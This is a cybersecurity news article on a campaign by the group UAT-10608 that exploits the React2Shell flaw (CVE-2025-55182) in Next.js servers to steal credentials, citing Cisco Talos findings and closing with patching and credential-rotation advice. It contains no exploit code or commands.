Massive React2Shell Attack Unleashes Devastating Credential Theft on Next.js Servers

Critical React2Shell Flaw Exploited Globally

Cybersecurity researchers at Cisco Talos have issued an urgent warning about a massive automated credential theft campaign actively targeting web applications worldwide. A sophisticated hacker group, tracked as UAT-10608, has already compromised over 700 servers by exploiting a critical security vulnerability known as React2Shell. This severe remote code execution flaw, identified as CVE-2025-55182, specifically targets Next.js applications.

The React2Shell vulnerability resides within React Server Components, allowing attackers to send a specially crafted web request. Crucially, due to improper data validation by the server, these requests execute hidden commands without requiring any passwords or user interaction, making it an extremely potent and dangerous attack vector.

Automated Exploitation & Data Harvesting

The UAT-10608 group employs automated tools to relentlessly scan the internet for vulnerable Next.js servers. Upon identifying a target, they immediately deploy the React2Shell exploit to gain initial unauthorized access. Following this initial breach, a malicious script is downloaded and installed onto the compromised server.

This script operates silently in the background, meticulously searching through server files, cloud settings, and system memory. Its primary objective is to harvest a wide array of valuable credentials, acting like a digital vacuum cleaner. The process unfolds in multiple phases, systematically extracting everything from critical cloud tokens to sensitive database passwords. All stolen data is then exfiltrated back to the hackers’ centralized command-and-control (C2) server.

NEXUS Listener: The Hackers’ Dashboard

To manage the staggering volume of stolen information, the attackers utilize a custom web dashboard named the “NEXUS Listener.” Cisco Talos researchers made a startling discovery: in a mere 24-hour period, this dashboard recorded 766 compromised hosts.

The NEXUS Listener dashboard provided a shocking glimpse into the scale and types of data theft:

• Over 90% of the compromised hosts had their database credentials stolen.
• Nearly 80% lost their private SSH keys, which are vital for secure server access.
• Hackers also successfully stole AWS cloud credentials, live Stripe payment keys, and valuable GitHub access tokens.

The Devastating Consequences of Credential Theft

The implications of this extensive attack are truly devastating. With stolen database passwords, attackers can gain unauthorized access to private user information, sensitive financial records, and other proprietary data. The exposure of SSH keys grants them the ability to move laterally and freely across various servers within a victim company’s network, escalating the breach.

Furthermore, compromised cloud credentials empower attackers to seize control over entire cloud environments, potentially leading to widespread service disruption, data manipulation, or further exploitation. The theft of GitHub tokens poses a significant risk, as these could be maliciously used to inject harmful code into legitimate software updates, affecting downstream users and supply chains.

Immediate Action Recommended to Mitigate React2Shell Threat

Companies utilizing Next.js applications must take swift and decisive action to protect themselves from this ongoing threat. Cybersecurity experts recommend the following urgent steps:

1. Patch Immediately: Organizations must urgently update their web applications to patch the React2Shell vulnerability (CVE-2025-55182). This is the most critical first step to close the initial attack vector.
2. Credential Rotation: Any company that suspects it might have been targeted should immediately change all its passwords, API keys, and security tokens across all systems and services.
3. Restrict Cloud Access: Experts advise restricting access to cloud metadata services to only essential functions and authorized personnel.
4. Monitor for Anomalies: Implement vigilant monitoring of servers for any unusual background processes or suspicious activity that could indicate an ongoing compromise.